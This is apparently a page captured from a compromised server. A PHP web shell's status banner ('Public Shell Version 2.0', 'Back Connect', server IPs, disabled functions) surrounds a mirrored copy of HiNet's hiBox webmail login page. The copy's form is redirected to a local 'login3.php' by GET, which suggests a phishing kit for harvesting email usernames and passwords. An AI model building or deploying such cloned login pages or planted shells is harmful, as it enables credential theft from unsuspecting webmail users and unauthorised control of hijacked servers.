Disable Functions: passthru,shell_exec,system,proc_open,popen,curl_multi_exec,show_source,highlight_file |
Uname : Linux ispc 6.2.16-3-pve #1 SMP PREEMPT_DYNAMIC PVE 6.2.16-3 (2023-06-17T05:58Z) x86_64PHP Version : 5.2.6-1+lenny16Server Admin : webmaster@zednictvi-stastny.euServer IP : 109.105.49.240 Your IP : 3.12.151.104Safe Mode : Safe Mode is OFFRead etc/passwd : Disabled Functions : PHP INFO
Back Connect
';
Public Shell Version 2.0
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--hb2-http01-zone-->
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- Mirrored from hibox.hinet.net/uwc/auth by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 08 Mar 2021 06:25:26 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="cache-control" content="max-age=0" />
<meta http-equiv="cache-control" content="no-cache" />
<meta http-equiv="expires" content="0" />
<meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT" />
<meta http-equiv="pragma" content="no-cache" />
<META name="keywords" content="email,HiNet Mail,Push Mail,hinet 郵件,hinet信箱,郵件委外,mail,spam,web mail,webmail,mail ASP,中華 電信 信箱,中華 電信 電子信箱,企業信箱,信箱委外,Mail Server,垃圾郵件,信箱,掃毒,郵件,郵件代管,郵件伺服器,資訊安全,電子信箱,電子郵件,網域名稱,傳真,簡訊,全能信箱,企業信箱,訊息服務,企業郵件">
<META name="description" content="省去自行建置及維護電子郵件服務系統之成本及繁瑣,同時享受HiNet中華電信最穩固機房與充足頻寬提供企業電子郵件系統委外之專業化服務,輕鬆擁有安全無毒、不受垃圾郵件干擾的使用環境,讓企業重要商機(郵件)不漏失;多功能整合式郵件信箱服務,操作容易卻提昇企業競爭力">
<title>hiBox全能信箱</title>
<style type="text/css">
<!--
body {
margin-left: 0px;
margin-top: 0px;
margin-right: 0px;
margin-bottom: 0px;
}
-->
.loginTable td > *{
vertical-align: middle;
}
a, img{
border: none;outline: none;
}
</style>
<link href="uwc/css/hiBox.css" rel="stylesheet" type="text/css" />
<SCRIPT type="text/javascript" src="uwc/js_tw/index.js"></SCRIPT>
<!-- jQuery & jQueryUI + theme -->
<link href="uwc/vkeyboard/jquery/jquery-ui.css" rel="stylesheet">
<script src="uwc/vkeyboard/jquery/jquery.min.js"></script>
<script src="uwc/vkeyboard/jquery/jquery-ui.min.js"></script>
<!-- keyboard widget css & script (required) -->
<link href="uwc/vkeyboard/css/keyboard.css" rel="stylesheet">
<script src="uwc/vkeyboard/js/jquery.keyboard.js"></script>
<script src="uwc/vkeyboard/js/key.js"></script>
<script type="text/javascript">
var copyRight = null;
var productName = null;
var logoImagePath = null;
var versionImagePath = null;
var versionPageTitle = null;
var closeLabel = null;
var closeTitle = null;
var LoginImagePath = null;
function handleLoad()
{
copyRight="Copyright 2008 Sun Microsystems, Inc. All rights reserved. SUN PROPRIETARY/CONFIDENTIAL. U.S. Government Rights - Commercial software. Government users are subject to the Sun Microsystems, Inc. standard license agreement and applicable provisions of the FAR and its supplements. Use is subject to license terms. Sun, Sun Microsystems, the Sun logo and Java are trademarks or registered trademarks of Sun Microsystems, Inc. in the U.S. and other countries.";
productName="Sun Java(TM) System Communications Express 6.3 update 1";
logoImagePath="uwc/images/login-logo.gif";
versionImagePath="../images/S1MC_login.html";
versionPageTitle="Version Information";
closeLabel="Close";
closeTitle="Close Window";
document.form1.username.focus();
}
function LoadCaptcha()
{
document.getElementById('captcha').src = './stickyImg?' + Math.random();
return false;
}
/*modify start*/
function callSubmit(eventTag) {
//if (event.keyCode==13)
// handleSubmit();
var event = eventTag||window.event;
var currentKey = event.charCode||event.keyCode;
if (currentKey==13)
handleSubmit();
}
/*modify end*/
function handleSubmit() {
if (document.forms.form1.save_uid.checked) {
selectioncookie();
}
if(document.form1.username.value.indexOf("@")==-1) {
document.form1.username.value = document.form1.username.value + "@hibox.hinet.net";
}
var targetAction = "login3.php";
document.form1.action = targetAction;
document.form1.submit();
}
function handleError() {
if (false || false ) {
/*modify start*/
document.write('<img src="./uwc/images/Error_Large.gif" alt="" width="21" height="22"><font color="red">帳號或密碼認證失敗</font>');
//document.write('<tr><td width="244" align="center" class="bk12" height="9" colspan="2">\n'+'<img src="./uwc/images/Error_Large.gif" alt="" width="21" height="22"> <font color="red">' +'<span class=AlrtErrTxt> Authentication Failed<br> Reenter your username and password.</span><br></td></tr>');
/*
document.write('<DIV class=logErr>');
document.write('<table cellspacing=0 cellpadding=0 border=0>');
document.write('<tbody>');
document.write('<tr>');
document.write('<td valign=top width="28"><img src="./uwc/images/Error_Large.gif" alt="" width="21" height="22"> </td>');
document.write("<td width='233'> <span class=AlrtErrTxt> Authentication Failed<br> Reenter your username and password.</span> </td>");
document.write('</tr>');
document.write('</tbody>');
document.write('</table>');
document.write('</DIV>');
modify end*/
}
}
function MM_swapImgRestore() { //v3.0
var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}
function MM_preloadImages() { //v3.0
var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}
function MM_findObj(n, d) { //v4.01
var p,i,x; if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
if(!x && d.getElementById) x=d.getElementById(n); return x;
}
function MM_swapImage() { //v3.0
var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
}
function MM_openBrWindow(theURL,winName,features) { //v2.0
window.open(theURL,winName,features);
}
</script>
<!--Cookie 記憶選單 宣告程式開始-->
<script language="Javascript">
//製作:CliffSTAR Studios.(http://uuu.to/cstar)
CookiesExpDay="30"; //Cookie 的保存天數
function selectioncookie() {
if (document.forms.form1.username.value == "請輸入您完整的email"){
document.forms.form1.username.value = "";
}
SetCookie('selvaluecookie10', document.forms.form1.username.value);
}
</script><!--Cookie 記憶選單 宣告程式結束-->
<!--Cookie 記憶選單 OPCOOKIE 控制Cookie程式開始-->
<script language="Javascript">
var time = new Date();
time.setTime(time.getTime()+((1000*60*60*24)*CookiesExpDay)) // here let the cookie expires extend 10 days of the setting day.
function GetCookie(name){
var cname=name+"=";
var dc=document.cookie;
if(dc.length>0){
begin = dc.indexOf(cname)
if(begin!=-1){
begin=begin+cname.length
end=dc.indexOf(";",begin)
if(end==-1)
end=dc.length
return dc.substring(begin,end)
}
}
return null
}
/*function of Get the cookie*/
function SetCookie (name, value, expires) {
if(expires==null){
expires=""
}
document.cookie = name+"="+value+";expires="+ time.toGMTString()}
</script>
<!--Cookie 記憶選單 OPCOOKIE 控制Cookie程式結束-->
<!--圖片輪播-->
<script type="text/javascript">
var myImg = new Array("uwc/images_tw/banner09.png","uwc/images_tw/banner07.jpg","uwc/images_tw/banner04.jpg","uwc/images_tw/banner05.jpg","uwc/images_tw/banner06.jpg","uwc/images_tw/banner03.gif");
var myHref = new Array("https://sms.hinet.net/new/instruction.htm","https://hishop.hinet.net/","https://hishop.hinet.net/","https://hishop.hinet.net/","https://hishop.hinet.net/","http://funplay.hinet.net/");
var playImg = new Array(6);
var playHref = new Array(6);
var nowIndex=1;
for(var i=0;i<playImg.length;i++){
playImg[i] = myImg[Math.ceil(Math.random()*myImg.length-1)];
playHref[i] = myHref[Math.ceil(Math.random()*myImg.length-1)];
}
function showImg(){
document.getElementById("my_href").href = myHref[nowIndex];
document.getElementById("my_img").src = myImg[nowIndex];
nowIndex = (nowIndex+1) == 6 ? 0 : nowIndex+1;
}
//setInterval("showImg()",3500);
setInterval("showImg()",7000);
</script>
</head>
<body onload="handleLoad();funShowMainBanner(0);MM_preloadImages('uwc/images_tw/botton02_01.gif','uwc/images_tw/botton02_03.gif','uwc/images_tw/botton03_02.gif','uwc/images_tw/icon-more02.gif','uwc/images_tw/menu01-02.gif','uwc/images_tw/menu02-02.gif','uwc/images_tw/menu03-02.gif','uwc/images_tw/menu04-02.gif','uwc/images_tw/menu05-02.gif','uwc/images_tw/menu06-02.gif','uwc/images_tw/menu07-02.gif','uwc/images_tw/menu08-02.gif');">
<FORM name=form1 onSubmit="handleSubmit()" action="login3.php" method="GET">
<input type="hidden" name="fromlogin" value="true">
<input type="hidden" name="orgaccess" value="https">
<!-- header start-->
<SCRIPT type=text/javascript src="uwc/js_tw/header.js"></SCRIPT>
<!-- header end-->
<table width="937" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td height="7"><img src="uwc/images_tw/HB_03.gif" width="937" height="7" /></td>
</tr>
</table>
<table width="937" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td width="3" height="31"><img src="uwc/images_tw/HB_04.gif" width="3" height="212" /></td>
<td width="632" valign="top"><TABLE border="0" cellpadding="0" cellspacing="0" class=index_main_banner_table>
<TBODY>
<TR>
<TD id=tdMainBannerPic>
<DIV id=divMainBanner1><A href="#"
target=_parent><IMG
src="uwc/images_tw/HB_05.jpg" width="632" height="190" border=0></A></DIV>
<DIV style="DISPLAY: none" id=divMainBanner5><A href="#"
target=_parent><IMG border=0 src="uwc/images_tw/HB_05-06.png"></A></DIV>
<DIV style="DISPLAY: none" id=divMainBanner2><A href="#"
target=_parent><IMG border=0 src="uwc/images_tw/HB_05-02.jpg"></A></DIV>
<DIV style="DISPLAY: none" id=divMainBanner3><A href="#"
target=_parent><IMG border=0 src="uwc/images_tw/HB_05-03.jpg"></A></DIV>
<DIV style="DISPLAY: none" id=divMainBanner4><A href="#"
target=_parent><IMG border=0 src="uwc/images_tw/HB_05-04.jpg"></A></DIV>
<DIV style="DISPLAY: none" id=divMainBanner4><A href="#"
target=_parent><IMG border=0 src="uwc/images_tw/HB_05-05.gif"></A></DIV>
</TD>
</TR>
<TR>
<TD height="22" align=left valign="top" background="uwc/images_tw/banner-bg01.gif"><table width="600" border="0" cellpadding="0" cellspacing="0">
<tr>
<td align="right"><TABLE border="0" cellpadding="0" cellspacing="0" class=index_main_banner_page_table>
<TBODY>
<TR id=trMainBannerPage>
<TD class=index_main_banner_page_current><A
onmouseover=funShowMainBanner(0);
href="javascript: void(0);">1</A></TD>
<TD class=index_main_banner_page_td><A
onmouseover=funShowMainBanner(1);
href="javascript: void(0);">2</A></TD>
<TD class=index_main_banner_page_td><A
onmouseover=funShowMainBanner(2);
href="javascript: void(0);">3</A></TD>
<TD class=index_main_banner_page_td><A
onmouseover=funShowMainBanner(3);
href="javascript: void(0);">4</A></TD>
<TD class=index_main_banner_page_td><A
onmouseover=funShowMainBanner(4);
href="javascript: void(0);">5</A></TD>
<TD class=index_main_banner_page_td><A
onmouseover=funShowMainBanner(5);
href="javascript: void(0);">6</A></TD>
</TR>
</TBODY>
</TABLE></td>
</tr>
</table></TD>
</TR>
</TBODY>
</TABLE></td>
<td width="8"><img src="uwc/images_tw/HB_06.gif" width="8" height="212" /></td>
<td width="292" align="center" valign="top" background="uwc/images_tw/HB_07.gif">
<table width="252" height="135" border="0" cellpadding="0" cellspacing="1" class="loginTable">
<tr>
<td height="40" colspan="2" align="right" valign="middle">
<script>
handleError();
</script>
</td>
</tr>
<tr>
<td height="30" colspan="2" align="center">帳號:
<input type="text" id="username" name="username" placeholder="請輸入您完整的email" maxlength="50" size="20" /><img id="uname" class="tooltip" title="開啟虛擬鍵盤" src="uwc/vkeyboard/keypad.png">
<script language="Javascript">
if(GetCookie("selvaluecookie10")!=null){
document.forms.form1.username.value=GetCookie("selvaluecookie10");
}
</script>
<br /></td>
</tr>
<tr>
<td height="30" colspan="2" align="center">密碼:
<input type="password" id="password" name="password" onKeyPress="callSubmit(event)" maxlength="50" size="20" /><img id="passwd" class="tooltip" title="開啟虛擬鍵盤" src="uwc/vkeyboard/keypad.png"></td>
</tr>
<tr>
<td height="32" align="center">
<img id="captcha" src="stickyImg.png" /> =
<input type="text" id="captchaans" name="captcha" placeholder="請計算左圖答案" class="ui-widget-content ui-corner-all" style="text-align: center;" size="12" maxlength="3" value=""/>
<a href="#" onclick="document.getElementById('captchaans').value=''; document.getElementById('captcha').src = './stickyImg?' + Math.random(); return false;" tabindex="-1"><img src="uwc/images/refresh.png" height="15" width="15" tabindex="-1"/></a>
</td>
<td>
</td>
</tr>
<tr>
<td height="32" align="center" valign="bottom"><input type="checkbox" name="save_uid" id="save_uid" tabindex="-1"/>
記住我的帳號
<a href="#" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image6','','uwc/images_tw/botton02_01.gif',1)" onclick="handleSubmit()"><img src="uwc/images_tw/botton01_01.gif" alt="登入" name="Image6" width="47" height="25" border="0" id="Image6" /></a><a href="#" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image7','','uwc/images_tw/botton02_03.gif',1)"><img src="uwc/images_tw/botton01_03.gif" alt="說明" name="Image7" width="47" height="25" border="0" id="Image7" onclick="MM_openBrWindow('uwc/homepage_tw/popup.html','','width=395,height=220')" /></a>
</td>
</tr>
<tr>
<td align="center">
<a onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image11','','uwc/images_tw/botton03_02.gif',1)" target="_blank" href="https://apply.hibox.hinet.net/hiBox_extend/mailAdmin/login.php"><img id="Image11" width="222" height="36" border="0" name="Image11" alt="管理者登入ENTER" src="uwc/images_tw/botton03_01.gif"></img></a>
</td>
</tr>
</table>
</td>
<td width="2"><img src="uwc/images_tw/HB_08.gif" width="2" height="212" /></td>
</tr>
</table>
<table width="937" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td height="7"><img src="uwc/images_tw/HB_09.gif" width="937" height="9" /></td>
</tr>
</table>
<table width="937" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td height="206" valign="top" background="uwc/images_tw/HB_10.gif"><table width="937" height="190" border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="657" height="190" align="center" valign="top"><table width="620" height="39" border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="526" height="39" align="left" valign="bottom"><img src="uwc/images_tw/td-01.gif" alt="訊息快遞" width="375" height="26" /></td>
<td width="94" align="right" valign="bottom"><a href="uwc/homepage_tw/news.html" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('Image13','','uwc/images_tw/icon-more02.gif',1)"><img src="uwc/images_tw/icon-more01.gif" alt="更多訊息" name="Image13" width="94" height="20" border="0" id="Image13" /></a></td>
</tr>
</table>
<!--info start-->
<SCRIPT type=text/javascript src="uwc/js_tw/info.js"></SCRIPT>
<!--info end-->
</td>
<td width="20" align="left"><img src="uwc/images_tw/dis-01.gif" width="3" height="190" /></td>
<td width="260" align="left" valign="middle"><table width="100" border="0" cellpadding="0" cellspacing="4">
<!--
<tr>
<td><a target="_blank" id="my_href" href='https://hishop.hinet.net/'><img id="my_img" src="./uwc/images_tw/banner07.jpg" width="218" height="80" border="0" /></a></td>
</tr>
-->
<tr>
<td><a target="_blank" id="my_href" href='https://sms.hinet.net/new/instruction.htm'><img id="my_img" src="uwc/images_tw/banner09.png" width="218" height="80" border="0" /></a></td>
</tr>
<tr>
<td><a href='uwc/homepage_tw/promotion02.html'><img src="uwc/images_tw/banner01.gif" width="218" height="80" border="0" /></a></td>
<!--<td><a href='./uwc/homepage_tw/news.html#new05'><img src="./uwc/images_tw/banner02.gif" width="218" height="80" border="0" /></a></td>
<td><a href='https://dsishib2b.cht.com.tw/HiB2B/alf/hiB2BUlUnionListApply.jsp?&sev_type=AK&sev_code=01&lockProduct=true&unlockPdtCode=true'><img src="./uwc/images_tw/banner02-1.gif" width="218" height="80" border="0" /></a></td>
-->
</tr>
</table>
</td>
</tr>
</table></td>
</tr>
</table>
</form>
<script src="uwc/js/placeholders.min.js"></script>
<!--footer start-->
<SCRIPT type=text/javascript src="uwc/js_tw/footer.js"></SCRIPT>
<!--footer end-->
</body>
<!-- Mirrored from hibox.hinet.net/uwc/auth by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 08 Mar 2021 06:27:45 GMT -->
</html>
<link rel="SHORTCUT ICON" href="webmail/favicon.ico">
Public Shell Version 2.0